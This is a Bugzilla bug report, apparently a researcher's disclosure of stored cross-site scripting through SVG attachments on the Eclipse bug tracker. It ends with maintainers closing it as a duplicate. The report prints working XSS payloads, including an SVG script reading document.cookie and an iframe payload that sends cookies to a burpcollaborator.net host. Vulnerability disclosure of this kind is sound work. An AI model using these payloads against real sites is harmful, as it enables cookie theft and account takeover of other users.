Bugzilla – Full Text Bug Listing
| Summary: | Stored Cross site scripting attack | ||||||
|---|---|---|---|---|---|---|---|
| Product: | Community | Reporter: | Manojkumar J <bughunter.mk> | ||||
| Component: | Website | Assignee: | phoenix.ui <phoenix.ui-inbox> | ||||
| Status: | CLOSED DUPLICATE | QA Contact: | |||||
| Severity: | critical | ||||||
| Priority: | P3 | CC: | denis.roy, wayne.beaton, webmaster | ||||
| Version: | unspecified | ||||||
| Target Milestone: | --- | ||||||
| Hardware: | PC | ||||||
| OS: | Windows 10 | ||||||
| Whiteboard: | |||||||
| Attachments: |
|
||||||
Here is the proof of concept image that has been attached. This stored XSS image file was fired once the user tried to click the file or open the file. Also, we can copy the file link sent to anyone to escalate it. Reproduction steps: go to the eclipse bug reporting page. Create svg xss image payload And upload it. And submit the report and open the uploaded payload it will fire the xss Cheers! You can see the file was looks like click to view... the link looks like https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227 If you open this link or open the file will fire the xss. Cheers! HEre is svg image xss payload script for your reproduction: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> prompt(document.cookie); </script> </svg> Also I can able to call the stored xss via using these links... https://bugs.eclipse.org/bugs/attachment.cgi?id=286227 https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227 Please contribute cve id with the finder of my name. Cheers! Hello @Wayne Beaton, Thanks for updating it to the P3. But it looks like p2 for me now. Also, It was possible to call via URLs. It was uploaded on 2 sub-domains. like, https://bugs.eclipse.org/bugs/attachment.cgi?id=286227 https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227 What does if rce or reverse shell payload do here? Get reverse shell. Another question, Is that possible to get cookie and location hash values via sharing the links to the users? Yes, if they have access, we can get the cookie or location hash values to takeover the account partially or potentially. I hope you understand my point! Cheers! So, if it is possible to takeover the accounts, it will be a P1 bug. Cheers! You can see below, Here is the possibilities of escalation looks like, We do have the stored xss always dangerous and it will be considered as high vulnerability. Here, the stored xss was an image. Which is holding or uploaded on 2 domains As a attacker I can able to call the stored xss image via both of domain URLs, those are below, https://bugs.eclipse.org/bugs/attachment.cgi?id=286227 https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227 Now, what does attacker do is, escalate rce or reverse shell or account takeover, if it is possible. so, as I said, the account takeover move is very simple. We can call the stored xss image via 2 domains URLs right? So, simple modify our svg xss payload like below, <iframe %00 src= javascript:fetch(\"//XXXXXXXXXXXXXXXXXXXXXXXXXXXXX.burpcollaborator.net/?param=\"+document.cookie) %00> It will get the anyone's cookie value to my lovely Buprsuite proxy. What does contains? Cookie value and other key values to login on their account. I hope you understand all the points very well now! Cheers! Team, I tried to escalate is but it takes more time and more effort and also It is needful to create more test reports again and again. So, it will be annoy you people. I am so sorry. I hope you people understand my point. Let me stop doing it. Cheers! This is a dupe of https://bugs.eclipse.org/bugs/show_bug.cgi?id=283232, and AFAIK by serving the attachment data from a separate domain we've done pretty much all we can to limit the risk. -M. *** This bug has been marked as a duplicate of bug 283232 *** > https://bugs.eclipse.org/bugs/attachment.cgi?id=286227
Confirmed that direct access to attachments on b.e.o leads to a 302
|
Created attachment 286227 [details] <img src="x" onerror="alert(1);"> Here I have uploaded xss svg image payload it will fire the xss attack. Cheers!